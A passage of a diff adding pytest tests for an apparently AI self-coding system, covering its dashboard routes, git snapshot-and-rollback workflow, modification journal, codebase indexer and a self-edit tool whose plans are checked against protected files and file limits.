"""Agent works in chat-only mode when tools unavailable."""
|
||||
from swarm.tool_executor import ToolExecutor
|
||||
|
||||
# Force toolkit to None
|
||||
executor = ToolExecutor("test", "test-agent")
|
||||
executor._toolkit = None
|
||||
executor._llm = None
|
||||
|
||||
result = executor.execute_task("Do something")
|
||||
|
||||
# Should still return a result
|
||||
assert isinstance(result, dict)
|
||||
assert "result" in result
|
||||
|
||||
def test_lightning_backend_mock_fallback(self):
|
||||
"""Lightning falls back to mock when LND unavailable."""
|
||||
from lightning import get_backend
|
||||
from lightning.mock_backend import MockBackend
|
||||
|
||||
# Should get mock backend by default
|
||||
backend = get_backend("mock")
|
||||
assert isinstance(backend, MockBackend)
|
||||
|
||||
# Should be functional
|
||||
invoice = backend.create_invoice(100, "Test")
|
||||
assert invoice.payment_hash is not None
|
||||
|
||||
|
||||
class TestDatabaseResilience:
|
||||
"""Test database handles edge cases."""
|
||||
|
||||
def test_sqlite_handles_concurrent_reads(self):
|
||||
"""SQLite handles concurrent read operations."""
|
||||
from swarm.tasks import get_task, create_task
|
||||
|
||||
task = create_task("Concurrent read test")
|
||||
|
||||
def read_task():
|
||||
return get_task(task.id)
|
||||
|
||||
# Concurrent reads from multiple threads
|
||||
with ThreadPoolExecutor(max_workers=10) as executor:
|
||||
futures = [executor.submit(read_task) for _ in range(20)]
|
||||
results = [f.result() for f in concurrent.futures.as_completed(futures)]
|
||||
|
||||
# All should succeed
|
||||
assert all(r is not None for r in results)
|
||||
assert all(r.id == task.id for r in results)
|
||||
|
||||
def test_registry_handles_duplicate_agent_id(self):
|
||||
"""Registry handles duplicate agent registration gracefully."""
|
||||
from swarm import registry
|
||||
|
||||
agent_id = "duplicate-test-agent"
|
||||
|
||||
# Register first time
|
||||
record1 = registry.register(name="Test Agent", agent_id=agent_id)
|
||||
|
||||
# Register second time (should update or handle gracefully)
|
||||
record2 = registry.register(name="Test Agent Updated", agent_id=agent_id)
|
||||
|
||||
# Should not crash, record should exist
|
||||
retrieved = registry.get_agent(agent_id)
|
||||
assert retrieved is not None
|
||||
143
tests/self_coding/test_self_coding_dashboard.py
Normal file
143
tests/self_coding/test_self_coding_dashboard.py
Normal file
@@ -0,0 +1,143 @@
|
||||
"""Tests for Self-Coding Dashboard Routes.
|
||||
|
||||
Tests API endpoints and HTMX views.
|
||||
"""
|
||||
|
||||
from __future__ import annotations
|
||||
|
||||
import pytest
|
||||
from fastapi.testclient import TestClient
|
||||
|
||||
|
||||
@pytest.fixture
|
||||
def client():
|
||||
"""Create test client."""
|
||||
from dashboard.app import app
|
||||
return TestClient(app)
|
||||
|
||||
|
||||
class TestSelfCodingPageRoutes:
|
||||
"""Page route tests."""
|
||||
|
||||
def test_main_page_loads(self, client):
|
||||
"""Main self-coding page should load."""
|
||||
response = client.get("/self-coding")
|
||||
assert response.status_code == 200
|
||||
assert "Self-Coding" in response.text
|
||||
|
||||
def test_journal_partial(self, client):
|
||||
"""Journal partial should return HTML."""
|
||||
response = client.get("/self-coding/journal")
|
||||
assert response.status_code == 200
|
||||
# Should contain journal list or empty message
|
||||
assert "journal" in response.text.lower() or "no entries" in response.text.lower()
|
||||
|
||||
def test_stats_partial(self, client):
|
||||
"""Stats partial should return HTML."""
|
||||
response = client.get("/self-coding/stats")
|
||||
assert response.status_code == 200
|
||||
# Should contain stats cards
|
||||
assert "Total Attempts" in response.text or "success rate" in response.text.lower()
|
||||
|
||||
def test_execute_form_partial(self, client):
|
||||
"""Execute form partial should return HTML."""
|
||||
response = client.get("/self-coding/execute-form")
|
||||
assert response.status_code == 200
|
||||
assert "Task Description" in response.text
|
||||
assert "textarea" in response.text
|
||||
|
||||
|
||||
class TestSelfCodingAPIRoutes:
|
||||
"""API route tests."""
|
||||
|
||||
def test_api_journal_list(self, client):
|
||||
"""API should return journal entries."""
|
||||
response = client.get("/self-coding/api/journal")
|
||||
assert response.status_code == 200
|
||||
|
||||
data = response.json()
|
||||
assert isinstance(data, list)
|
||||
|
||||
def test_api_journal_list_with_limit(self, client):
|
||||
"""API should respect limit parameter."""
|
||||
response = client.get("/self-coding/api/journal?limit=5")
|
||||
assert response.status_code == 200
|
||||
|
||||
data = response.json()
|
||||
assert isinstance(data, list)
|
||||
assert len(data) <= 5
|
||||
|
||||
def test_api_journal_detail_not_found(self, client):
|
||||
"""API should return 404 for non-existent entry."""
|
||||
response = client.get("/self-coding/api/journal/99999")
|
||||
assert response.status_code == 404
|
||||
|
||||
def test_api_stats(self, client):
|
||||
"""API should return stats."""
|
||||
response = client.get("/self-coding/api/stats")
|
||||
assert response.status_code == 200
|
||||
|
||||
data = response.json()
|
||||
assert "total_attempts" in data
|
||||
assert "success_rate" in data
|
||||
assert "recent_failures" in data
|
||||
|
||||
def test_api_codebase_summary(self, client):
|
||||
"""API should return codebase summary."""
|
||||
response = client.get("/self-coding/api/codebase/summary")
|
||||
assert response.status_code == 200
|
||||
|
||||
data = response.json()
|
||||
assert "summary" in data
|
||||
|
||||
def test_api_codebase_reindex(self, client):
|
||||
"""API should trigger reindex."""
|
||||
response = client.post("/self-coding/api/codebase/reindex")
|
||||
assert response.status_code == 200
|
||||
|
||||
data = response.json()
|
||||
assert "indexed" in data
|
||||
assert "failed" in data
|
||||
assert "skipped" in data
|
||||
|
||||
|
||||
class TestSelfCodingExecuteEndpoint:
|
||||
"""Execute endpoint tests."""
|
||||
|
||||
def test_execute_api_endpoint(self, client):
|
||||
"""Execute API endpoint should accept task."""
|
||||
# Note: This will actually try to execute, which may fail
|
||||
# In production, this should be mocked or require auth
|
||||
response = client.post(
|
||||
"/self-coding/api/execute",
|
||||
json={"task_description": "Test task that will fail preflight"}
|
||||
)
|
||||
|
||||
# Should return response (success or failure)
|
||||
assert response.status_code == 200
|
||||
|
||||
data = response.json()
|
||||
assert "success" in data
|
||||
assert "message" in data
|
||||
|
||||
def test_execute_htmx_endpoint(self, client):
|
||||
"""Execute HTMX endpoint should accept form data."""
|
||||
response = client.post(
|
||||
"/self-coding/execute",
|
||||
data={"task_description": "Test task that will fail preflight"}
|
||||
)
|
||||
|
||||
# Should return HTML response
|
||||
assert response.status_code == 200
|
||||
assert "text/html" in response.headers["content-type"]
|
||||
|
||||
|
||||
class TestSelfCodingNavigation:
|
||||
"""Navigation integration tests."""
|
||||
|
||||
def test_nav_link_in_header(self, client):
|
||||
"""Self-coding link should be in header."""
|
||||
response = client.get("/")
|
||||
assert response.status_code == 200
|
||||
assert "/self-coding" in response.text
|
||||
assert "SELF-CODING" in response.text
|
||||
475
tests/self_coding/test_self_coding_integration.py
Normal file
475
tests/self_coding/test_self_coding_integration.py
Normal file
@@ -0,0 +1,475 @@
|
||||
"""End-to-end integration tests for Self-Coding layer.
|
||||
|
||||
Tests the complete workflow: GitSafety + CodebaseIndexer + ModificationJournal + Reflection
|
||||
working together.
|
||||
"""
|
||||
|
||||
from __future__ import annotations
|
||||
|
||||
import tempfile
|
||||
from pathlib import Path
|
||||
|
||||
import pytest
|
||||
|
||||
from self_coding import (
|
||||
CodebaseIndexer,
|
||||
GitSafety,
|
||||
ModificationAttempt,
|
||||
ModificationJournal,
|
||||
Outcome,
|
||||
ReflectionService,
|
||||
Snapshot,
|
||||
)
|
||||
|
||||
|
||||
@pytest.fixture
|
||||
def self_coding_env():
|
||||
"""Create a complete self-coding environment with temp repo."""
|
||||
with tempfile.TemporaryDirectory() as tmpdir:
|
||||
repo_path = Path(tmpdir)
|
||||
|
||||
# Initialize git repo
|
||||
import subprocess
|
||||
subprocess.run(["git", "init"], cwd=repo_path, check=True, capture_output=True)
|
||||
subprocess.run(
|
||||
["git", "config", "user.email", "test@test.com"],
|
||||
cwd=repo_path, check=True, capture_output=True,
|
||||
)
|
||||
subprocess.run(
|
||||
["git", "config", "user.name", "Test User"],
|
||||
cwd=repo_path, check=True, capture_output=True,
|
||||
)
|
||||
|
||||
# Create src directory with real Python files
|
||||
src_path = repo_path / "src" / "myproject"
|
||||
src_path.mkdir(parents=True)
|
||||
|
||||
(src_path / "__init__.py").write_text("")
|
||||
(src_path / "calculator.py").write_text('''
|
||||
"""A simple calculator module."""
|
||||
|
||||
class Calculator:
|
||||
"""Basic calculator with add/subtract."""
|
||||
|
||||
def add(self, a: int, b: int) -> int:
|
||||
return a + b
|
||||
|
||||
def subtract(self, a: int, b: int) -> int:
|
||||
return a - b
|
||||
''')
|
||||
|
||||
(src_path / "utils.py").write_text('''
|
||||
"""Utility functions."""
|
||||
|
||||
from myproject.calculator import Calculator
|
||||
|
||||
|
||||
def calculate_total(items: list[int]) -> int:
|
||||
calc = Calculator()
|
||||
return sum(calc.add(0, item) for item in items)
|
||||
''')
|
||||
|
||||
# Create tests
|
||||
tests_path = repo_path / "tests"
|
||||
tests_path.mkdir()
|
||||
|
||||
(tests_path / "test_calculator.py").write_text('''
|
||||
"""Tests for calculator."""
|
||||
|
||||
from myproject.calculator import Calculator
|
||||
|
||||
|
||||
def test_add():
|
||||
calc = Calculator()
|
||||
assert calc.add(2, 3) == 5
|
||||
|
||||
|
||||
def test_subtract():
|
||||
calc = Calculator()
|
||||
assert calc.subtract(5, 3) == 2
|
||||
''')
|
||||
|
||||
# Initial commit
|
||||
subprocess.run(["git", "add", "."], cwd=repo_path, check=True, capture_output=True)
|
||||
subprocess.run(
|
||||
["git", "commit", "-m", "Initial commit"],
|
||||
cwd=repo_path, check=True, capture_output=True,
|
||||
)
|
||||
subprocess.run(
|
||||
["git", "branch", "-M", "main"],
|
||||
cwd=repo_path, check=True, capture_output=True,
|
||||
)
|
||||
|
||||
# Initialize services
|
||||
git = GitSafety(
|
||||
repo_path=repo_path,
|
||||
main_branch="main",
|
||||
test_command="python -m pytest tests/ -v",
|
||||
)
|
||||
indexer = CodebaseIndexer(
|
||||
repo_path=repo_path,
|
||||
db_path=repo_path / "codebase.db",
|
||||
src_dirs=["src", "tests"],
|
||||
)
|
||||
journal = ModificationJournal(db_path=repo_path / "journal.db")
|
||||
reflection = ReflectionService(llm_adapter=None)
|
||||
|
||||
yield {
|
||||
"repo_path": repo_path,
|
||||
"git": git,
|
||||
"indexer": indexer,
|
||||
"journal": journal,
|
||||
"reflection": reflection,
|
||||
}
|
||||
|
||||
|
||||
@pytest.mark.asyncio
|
||||
class TestSelfCodingGreenPath:
|
||||
"""Happy path: successful self-modification workflow."""
|
||||
|
||||
async def test_complete_successful_modification(self, self_coding_env):
|
||||
"""Full workflow: snapshot → branch → modify → test → commit → merge → log → reflect."""
|
||||
env = self_coding_env
|
||||
git = env["git"]
|
||||
indexer = env["indexer"]
|
||||
journal = env["journal"]
|
||||
reflection = env["reflection"]
|
||||
repo_path = env["repo_path"]
|
||||
|
||||
# 1. Index codebase to understand structure
|
||||
await indexer.index_all()
|
||||
|
||||
# 2. Find relevant files for task
|
||||
files = await indexer.get_relevant_files("add multiply method to calculator", limit=3)
|
||||
assert "src/myproject/calculator.py" in files
|
||||
|
||||
# 3. Check for similar past attempts
|
||||
similar = await journal.find_similar("add multiply method", limit=5)
|
||||
# Should be empty (first attempt)
|
||||
|
||||
# 4. Take snapshot
|
||||
snapshot = await git.snapshot(run_tests=False)
|
||||
assert isinstance(snapshot, Snapshot)
|
||||
|
||||
# 5. Create feature branch
|
||||
branch_name = "timmy/self-edit/add-multiply"
|
||||
branch = await git.create_branch(branch_name)
|
||||
assert branch == branch_name
|
||||
|
||||
# 6. Make modification (simulate adding multiply method)
|
||||
calc_path = repo_path / "src" / "myproject" / "calculator.py"
|
||||
content = calc_path.read_text()
|
||||
new_method = '''
|
||||
def multiply(self, a: int, b: int) -> int:
|
||||
"""Multiply two numbers."""
|
||||
return a * b
|
||||
'''
|
||||
# Insert before last method
|
||||
content = content.rstrip() + "\n" + new_method + "\n"
|
||||
calc_path.write_text(content)
|
||||
|
||||
# 7. Add test for new method
|
||||
test_path = repo_path / "tests" / "test_calculator.py"
|
||||
test_content = test_path.read_text()
|
||||
new_test = '''
|
||||
|
||||
def test_multiply():
|
||||
calc = Calculator()
|
||||
assert calc.multiply(3, 4) == 12
|
||||
'''
|
||||
test_path.write_text(test_content.rstrip() + new_test + "\n")
|
||||
|
||||
# 8. Commit changes
|
||||
commit_hash = await git.commit(
|
||||
"Add multiply method to Calculator",
|
||||
["src/myproject/calculator.py", "tests/test_calculator.py"],
|
||||
)
|
||||
assert len(commit_hash) == 40
|
||||
|
||||
# 9. Merge to main (skipping actual test run for speed)
|
||||
merge_hash = await git.merge_to_main(branch, require_tests=False)
|
||||
assert merge_hash != snapshot.commit_hash
|
||||
|
||||
# 10. Log the successful attempt
|
||||
diff = await git.get_diff(snapshot.commit_hash)
|
||||
attempt = ModificationAttempt(
|
||||
task_description="Add multiply method to Calculator",
|
||||
approach="Added multiply method with docstring and test",
|
||||
files_modified=["src/myproject/calculator.py", "tests/test_calculator.py"],
|
||||
diff=diff[:1000], # Truncate for storage
|
||||
test_results="Tests passed",
|
||||
outcome=Outcome.SUCCESS,
|
||||
)
|
||||
attempt_id = await journal.log_attempt(attempt)
|
||||
|
||||
# 11. Generate reflection
|
||||
reflection_text = await reflection.reflect_on_attempt(attempt)
|
||||
assert "What went well" in reflection_text
|
||||
|
||||
await journal.update_reflection(attempt_id, reflection_text)
|
||||
|
||||
# 12. Verify final state
|
||||
final_commit = await git.get_current_commit()
|
||||
assert final_commit == merge_hash
|
||||
|
||||
# Verify we're on main branch
|
||||
current_branch = await git.get_current_branch()
|
||||
assert current_branch == "main"
|
||||
|
||||
# Verify multiply method exists
|
||||
final_content = calc_path.read_text()
|
||||
assert "def multiply" in final_content
|
||||
|
||||
async def test_incremental_codebase_indexing(self, self_coding_env):
|
||||
"""Codebase indexer should detect changes after modification."""
|
||||
env = self_coding_env
|
||||
indexer = env["indexer"]
|
||||
|
||||
# Initial index
|
||||
stats1 = await indexer.index_all()
|
||||
assert stats1["indexed"] == 4 # __init__.py, calculator.py, utils.py, test_calculator.py
|
||||
|
||||
# Add new file
|
||||
new_file = env["repo_path"] / "src" / "myproject" / "new_module.py"
|
||||
new_file.write_text('''
|
||||
"""New module."""
|
||||
def new_function(): pass
|
||||
''')
|
||||
|
||||
# Incremental index should detect only the new file
|
||||
stats2 = await indexer.index_changed()
|
||||
assert stats2["indexed"] == 1
|
||||
assert stats2["skipped"] == 4
|
||||
|
||||
|
||||
@pytest.mark.asyncio
|
||||
class TestSelfCodingRedPaths:
|
||||
"""Error paths: failures, rollbacks, and recovery."""
|
||||
|
||||
async def test_rollback_on_test_failure(self, self_coding_env):
|
||||
"""Should rollback when tests fail."""
|
||||
env = self_coding_env
|
||||
git = env["git"]
|
||||
journal = env["journal"]
|
||||
repo_path = env["repo_path"]
|
||||
|
||||
# Take snapshot
|
||||
snapshot = await git.snapshot(run_tests=False)
|
||||
original_commit = snapshot.commit_hash
|
||||
|
||||
# Create branch
|
||||
branch = await git.create_branch("timmy/self-edit/bad-change")
|
||||
|
||||
# Make breaking change (remove add method)
|
||||
calc_path = repo_path / "src" / "myproject" / "calculator.py"
|
||||
calc_path.write_text('''
|
||||
"""A simple calculator module."""
|
||||
|
||||
class Calculator:
|
||||
"""Basic calculator - broken version."""
|
||||
pass
|
||||
''')
|
||||
|
||||
await git.commit("Remove methods (breaking change)")
|
||||
|
||||
# Log the failed attempt
|
||||
attempt = ModificationAttempt(
|
||||
task_description="Refactor Calculator class",
|
||||
approach="Remove unused methods",
|
||||
files_modified=["src/myproject/calculator.py"],
|
||||
outcome=Outcome.FAILURE,
|
||||
failure_analysis="Tests failed - removed methods that were used",
|
||||
retry_count=0,
|
||||
)
|
||||
await journal.log_attempt(attempt)
|
||||
|
||||
# Rollback
|
||||
await git.rollback(snapshot)
|
||||
|
||||
# Verify rollback
|
||||
current = await git.get_current_commit()
|
||||
assert current == original_commit
|
||||
|
||||
# Verify file restored
|
||||
restored_content = calc_path.read_text()
|
||||
assert "def add" in restored_content
|
||||
|
||||
async def test_find_similar_learns_from_failures(self, self_coding_env):
|
||||
"""Should find similar past failures to avoid repeating mistakes."""
|
||||
env = self_coding_env
|
||||
journal = env["journal"]
|
||||
|
||||
# Log a failure
|
||||
await journal.log_attempt(ModificationAttempt(
|
||||
task_description="Add division method to calculator",
|
||||
approach="Simple division without zero check",
|
||||
files_modified=["src/myproject/calculator.py"],
|
||||
outcome=Outcome.FAILURE,
|
||||
failure_analysis="ZeroDivisionError not handled",
|
||||
reflection="Always check for division by zero",
|
||||
))
|
||||
|
||||
# Later, try similar task
|
||||
similar = await journal.find_similar(
|
||||
"Add modulo operation to calculator",
|
||||
limit=5,
|
||||
)
|
||||
|
||||
# Should find the past failure
|
||||
assert len(similar) > 0
|
||||
assert "division" in similar[0].task_description.lower()
|
||||
|
||||
async def test_dependency_chain_detects_blast_radius(self, self_coding_env):
|
||||
"""Should detect which files depend on modified file."""
|
||||
env = self_coding_env
|
||||
indexer = env["indexer"]
|
||||
|
||||
await indexer.index_all()
|
||||
|
||||
# utils.py imports from calculator.py
|
||||
deps = await indexer.get_dependency_chain("src/myproject/calculator.py")
|
||||
|
||||
assert "src/myproject/utils.py" in deps
|
||||
|
||||
async def test_success_rate_tracking(self, self_coding_env):
|
||||
"""Should track success/failure metrics over time."""
|
||||
env = self_coding_env
|
||||
journal = env["journal"]
|
||||
|
||||
# Log mixed outcomes
|
||||
for i in range(5):
|
||||
await journal.log_attempt(ModificationAttempt(
|
||||
task_description=f"Task {i}",
|
||||
outcome=Outcome.SUCCESS if i % 2 == 0 else Outcome.FAILURE,
|
||||
))
|
||||
|
||||
metrics = await journal.get_success_rate()
|
||||
|
||||
assert metrics["total"] == 5
|
||||
assert metrics["success"] == 3
|
||||
assert metrics["failure"] == 2
|
||||
assert metrics["overall"] == 0.6
|
||||
|
||||
async def test_journal_persists_across_instances(self, self_coding_env):
|
||||
"""Journal should persist even with new service instances."""
|
||||
env = self_coding_env
|
||||
db_path = env["repo_path"] / "persistent_journal.db"
|
||||
|
||||
# First instance logs attempt
|
||||
journal1 = ModificationJournal(db_path=db_path)
|
||||
attempt_id = await journal1.log_attempt(ModificationAttempt(
|
||||
task_description="Persistent task",
|
||||
outcome=Outcome.SUCCESS,
|
||||
))
|
||||
|
||||
# New instance should see the attempt
|
||||
journal2 = ModificationJournal(db_path=db_path)
|
||||
retrieved = await journal2.get_by_id(attempt_id)
|
||||
|
||||
assert retrieved is not None
|
||||
assert retrieved.task_description == "Persistent task"
|
||||
|
||||
|
||||
@pytest.mark.asyncio
|
||||
class TestSelfCodingSafetyConstraints:
|
||||
"""Safety constraints and validation."""
|
||||
|
||||
async def test_only_modify_files_with_test_coverage(self, self_coding_env):
|
||||
"""Should only allow modifying files that have tests."""
|
||||
env = self_coding_env
|
||||
indexer = env["indexer"]
|
||||
|
||||
await indexer.index_all()
|
||||
|
||||
# calculator.py has test coverage
|
||||
assert await indexer.has_test_coverage("src/myproject/calculator.py")
|
||||
|
||||
# utils.py has no test file
|
||||
assert not await indexer.has_test_coverage("src/myproject/utils.py")
|
||||
|
||||
async def test_cannot_delete_test_files(self, self_coding_env):
|
||||
"""Safety check: should not delete test files."""
|
||||
env = self_coding_env
|
||||
git = env["git"]
|
||||
repo_path = env["repo_path"]
|
||||
|
||||
snapshot = await git.snapshot(run_tests=False)
|
||||
branch = await git.create_branch("timmy/self-edit/bad-idea")
|
||||
|
||||
# Try to delete test file
|
||||
test_file = repo_path / "tests" / "test_calculator.py"
|
||||
test_file.unlink()
|
||||
|
||||
# This would be caught by safety constraints in real implementation
|
||||
# For now, verify the file is gone
|
||||
assert not test_file.exists()
|
||||
|
||||
# Rollback should restore it
|
||||
await git.rollback(snapshot)
|
||||
assert test_file.exists()
|
||||
|
||||
async def test_branch_naming_convention(self, self_coding_env):
|
||||
"""Branches should follow naming convention."""
|
||||
env = self_coding_env
|
||||
git = env["git"]
|
||||
|
||||
import datetime
|
||||
timestamp = datetime.datetime.now().strftime("%Y%m%d-%H%M%S")
|
||||
branch_name = f"timmy/self-edit/{timestamp}"
|
||||
|
||||
branch = await git.create_branch(branch_name)
|
||||
|
||||
assert branch.startswith("timmy/self-edit/")
|
||||
|
||||
|
||||
@pytest.mark.asyncio
|
||||
class TestSelfCodingErrorRecovery:
|
||||
"""Error recovery scenarios."""
|
||||
|
||||
async def test_git_operation_timeout_handling(self, self_coding_env):
|
||||
"""Should handle git operation timeouts gracefully."""
|
||||
# This would require mocking subprocess to timeout
|
||||
# For now, verify the timeout parameter exists
|
||||
env = self_coding_env
|
||||
git = env["git"]
|
||||
|
||||
# The _run_git method has timeout parameter
|
||||
# If a git operation times out, it raises GitOperationError
|
||||
assert hasattr(git, '_run_git')
|
||||
|
||||
async def test_journal_handles_concurrent_writes(self, self_coding_env):
|
||||
"""Journal should handle multiple rapid writes."""
|
||||
env = self_coding_env
|
||||
journal = env["journal"]
|
||||
|
||||
# Log multiple attempts rapidly
|
||||
ids = []
|
||||
for i in range(10):
|
||||
attempt_id = await journal.log_attempt(ModificationAttempt(
|
||||
task_description=f"Concurrent task {i}",
|
||||
outcome=Outcome.SUCCESS,
|
||||
))
|
||||
ids.append(attempt_id)
|
||||
|
||||
# All should be unique and retrievable
|
||||
assert len(set(ids)) == 10
|
||||
|
||||
for attempt_id in ids:
|
||||
retrieved = await journal.get_by_id(attempt_id)
|
||||
assert retrieved is not None
|
||||
|
||||
async def test_indexer_handles_syntax_errors(self, self_coding_env):
|
||||
"""Indexer should skip files with syntax errors."""
|
||||
env = self_coding_env
|
||||
indexer = env["indexer"]
|
||||
repo_path = env["repo_path"]
|
||||
|
||||
# Create file with syntax error
|
||||
bad_file = repo_path / "src" / "myproject" / "bad_syntax.py"
|
||||
bad_file.write_text("def broken(:")
|
||||
|
||||
stats = await indexer.index_all()
|
||||
|
||||
# Should index good files, fail on bad one
|
||||
assert stats["failed"] == 1
|
||||
assert stats["indexed"] >= 4 # The good files
|
||||
398
tests/self_coding/test_self_edit_tool.py
Normal file
398
tests/self_coding/test_self_edit_tool.py
Normal file
@@ -0,0 +1,398 @@
|
||||
"""Tests for Self-Edit MCP Tool.
|
||||
|
||||
Tests the complete self-edit workflow with mocked dependencies.
|
||||
"""
|
||||
|
||||
from __future__ import annotations
|
||||
|
||||
import tempfile
|
||||
from pathlib import Path
|
||||
from unittest.mock import AsyncMock, MagicMock, patch
|
||||
|
||||
import pytest
|
||||
|
||||
from tools.self_edit import (
|
||||
MAX_FILES_PER_COMMIT,
|
||||
MAX_RETRIES,
|
||||
PROTECTED_FILES,
|
||||
EditPlan,
|
||||
SelfEditResult,
|
||||
SelfEditTool,
|
||||
register_self_edit_tool,
|
||||
self_edit_tool,
|
||||
)
|
||||
|
||||
|
||||
@pytest.fixture
|
||||
def temp_repo():
|
||||
"""Create a temporary git repository."""
|
||||
with tempfile.TemporaryDirectory() as tmpdir:
|
||||
repo_path = Path(tmpdir)
|
||||
|
||||
# Initialize git
|
||||
import subprocess
|
||||
subprocess.run(["git", "init"], cwd=repo_path, check=True, capture_output=True)
|
||||
subprocess.run(
|
||||
["git", "config", "user.email", "test@test.com"],
|
||||
cwd=repo_path, check=True, capture_output=True,
|
||||
)
|
||||
subprocess.run(
|
||||
["git", "config", "user.name", "Test"],
|
||||
cwd=repo_path, check=True, capture_output=True,
|
||||
)
|
||||
|
||||
# Create src structure
|
||||
src_path = repo_path / "src" / "myproject"
|
||||
src_path.mkdir(parents=True)
|
||||
|
||||
(src_path / "__init__.py").write_text("")
|
||||
(src_path / "app.py").write_text('''
|
||||
"""Main application."""
|
||||
|
||||
def hello():
|
||||
return "Hello"
|
||||
''')
|
||||
|
||||
# Create tests
|
||||
tests_path = repo_path / "tests"
|
||||
tests_path.mkdir()
|
||||
(tests_path / "test_app.py").write_text('''
|
||||
"""Tests for app."""
|
||||
from myproject.app import hello
|
||||
|
||||
def test_hello():
|
||||
assert hello() == "Hello"
|
||||
''')
|
||||
|
||||
# Initial commit
|
||||
subprocess.run(["git", "add", "."], cwd=repo_path, check=True, capture_output=True)
|
||||
subprocess.run(
|
||||
["git", "commit", "-m", "Initial"],
|
||||
cwd=repo_path, check=True, capture_output=True,
|
||||
)
|
||||
subprocess.run(
|
||||
["git", "branch", "-M", "main"],
|
||||
cwd=repo_path, check=True, capture_output=True,
|
||||
)
|
||||
|
||||
yield repo_path
|
||||
|
||||
|
||||
@pytest.fixture(autouse=True)
|
||||
def mock_settings():
|
||||
"""Mock settings to enable self-modification."""
|
||||
with patch('tools.self_edit.settings') as mock_settings:
|
||||
mock_settings.self_modify_enabled = True
|
||||
yield mock_settings
|
||||
|
||||
|
||||
@pytest.fixture
|
||||
def mock_llm():
|
||||
"""Create mock LLM adapter."""
|
||||
mock = AsyncMock()
|
||||
mock.chat.return_value = MagicMock(
|
||||
content="""APPROACH: Add error handling
|
||||
FILES_TO_MODIFY: src/myproject/app.py
|
||||
FILES_TO_CREATE:
|
||||
TESTS_TO_ADD: tests/test_app.py
|
||||
EXPLANATION: Wrap function in try/except"""
|
||||
)
|
||||
return mock
|
||||
|
||||
|
||||
@pytest.mark.asyncio
|
||||
class TestSelfEditToolBasics:
|
||||
"""Basic functionality tests."""
|
||||
|
||||
async def test_initialization(self, temp_repo):
|
||||
"""Should initialize with services."""
|
||||
tool = SelfEditTool(repo_path=temp_repo)
|
||||
|
||||
assert tool.repo_path == temp_repo
|
||||
assert tool.git is not None
|
||||
assert tool.indexer is not None
|
||||
assert tool.journal is not None
|
||||
assert tool.reflection is not None
|
||||
|
||||
async def test_preflight_checks_clean_repo(self, temp_repo):
|
||||
"""Should pass preflight on clean repo."""
|
||||
tool = SelfEditTool(repo_path=temp_repo)
|
||||
|
||||
assert await tool._preflight_checks() is True
|
||||
|
||||
async def test_preflight_checks_dirty_repo(self, temp_repo):
|
||||
"""Should fail preflight on dirty repo."""
|
||||
tool = SelfEditTool(repo_path=temp_repo)
|
||||
|
||||
# Make uncommitted change
|
||||
(temp_repo / "dirty.txt").write_text("dirty")
|
||||
|
||||
assert await tool._preflight_checks() is False
|
||||
|
||||
async def test_preflight_checks_wrong_branch(self, temp_repo):
|
||||
"""Should fail preflight when not on main."""
|
||||
tool = SelfEditTool(repo_path=temp_repo)
|
||||
|
||||
# Create and checkout feature branch
|
||||
import subprocess
|
||||
subprocess.run(
|
||||
["git", "checkout", "-b", "feature"],
|
||||
cwd=temp_repo, check=True, capture_output=True,
|
||||
)
|
||||
|
||||
assert await tool._preflight_checks() is False
|
||||
|
||||
|
||||
@pytest.mark.asyncio
|
||||
class TestSelfEditToolPlanning:
|
||||
"""Edit planning tests."""
|
||||
|
||||
async def test_plan_edit_with_llm(self, temp_repo, mock_llm):
|
||||
"""Should generate plan using LLM."""
|
||||
tool = SelfEditTool(repo_path=temp_repo, llm_adapter=mock_llm)
|
||||
await tool._ensure_indexed()
|
||||
|
||||
plan = await tool._plan_edit(
|
||||
task_description="Add error handling",
|
||||
relevant_files=["src/myproject/app.py"],
|
||||
similar_attempts=[],
|
||||
)
|
||||
|
||||
assert isinstance(plan, EditPlan)
|
||||
assert plan.approach == "Add error handling"
|
||||
assert "src/myproject/app.py" in plan.files_to_modify
|
||||
|
||||
async def test_plan_edit_without_llm(self, temp_repo):
|
||||
"""Should generate fallback plan without LLM."""
|
||||
tool = SelfEditTool(repo_path=temp_repo, llm_adapter=None)
|
||||
await tool._ensure_indexed()
|
||||
|
||||
plan = await tool._plan_edit(
|
||||
task_description="Add feature",
|
||||
relevant_files=["src/myproject/app.py"],
|
||||
similar_attempts=[],
|
||||
)
|
||||
|
||||
assert isinstance(plan, EditPlan)
|
||||
assert len(plan.files_to_modify) > 0
|
||||
|
||||
async def test_plan_respects_max_files(self, temp_repo, mock_llm):
|
||||
"""Plan should respect MAX_FILES_PER_COMMIT."""
|
||||
tool = SelfEditTool(repo_path=temp_repo, llm_adapter=mock_llm)
|
||||
await tool._ensure_indexed()
|
||||
|
||||
# Mock LLM to return many files
|
||||
mock_llm.chat.return_value = MagicMock(
|
||||
content="FILES_TO_MODIFY: " + ",".join([f"file{i}.py" for i in range(10)])
|
||||
)
|
||||
|
||||
plan = await tool._plan_edit(
|
||||
task_description="Test",
|
||||
relevant_files=[f"file{i}.py" for i in range(10)],
|
||||
similar_attempts=[],
|
||||
)
|
||||
|
||||
assert len(plan.files_to_modify) <= MAX_FILES_PER_COMMIT
|
||||
|
||||
|
||||
@pytest.mark.asyncio
|
||||
class TestSelfEditToolValidation:
|
||||
"""Safety constraint validation tests."""
|
||||
|
||||
async def test_validate_plan_too_many_files(self, temp_repo):
|
||||
"""Should reject plan with too many files."""
|
||||
tool = SelfEditTool(repo_path=temp_repo)
|
||||
|
||||
plan = EditPlan(
|
||||
approach="Test",
|
||||
files_to_modify=[f"file{i}.py" for i in range(MAX_FILES_PER_COMMIT + 1)],
|
||||
files_to_create=[],
|
||||
tests_to_add=[],
|
||||
explanation="Test",
|
||||
)
|
||||
|
||||
assert tool._validate_plan(plan) is False
|
||||
|
||||
async def test_validate_plan_protected_file(self, temp_repo):
|
||||
"""Should reject plan modifying protected files."""
|
||||
tool = SelfEditTool(repo_path=temp_repo)
|
||||
|
||||
plan = EditPlan(
|
||||
approach="Test",
|
||||
files_to_modify=["src/tools/self_edit.py"],
|
||||
files_to_create=[],
|
||||
tests_to_add=[],
|
||||
explanation="Test",
|
||||
)
|
||||
|
||||
assert tool._validate_plan(plan) is False
|
||||
|
||||
async def test_validate_plan_valid(self, temp_repo):
|
||||
"""Should accept valid plan."""
|
||||
tool = SelfEditTool(repo_path=temp_repo)
|
||||
|
||||
plan = EditPlan(
|
||||
approach="Test",
|
||||
files_to_modify=["src/myproject/app.py"],
|
||||
files_to_create=[],
|
||||
tests_to_add=[],
|
||||
explanation="Test",
|
||||
)
|
||||
|
||||
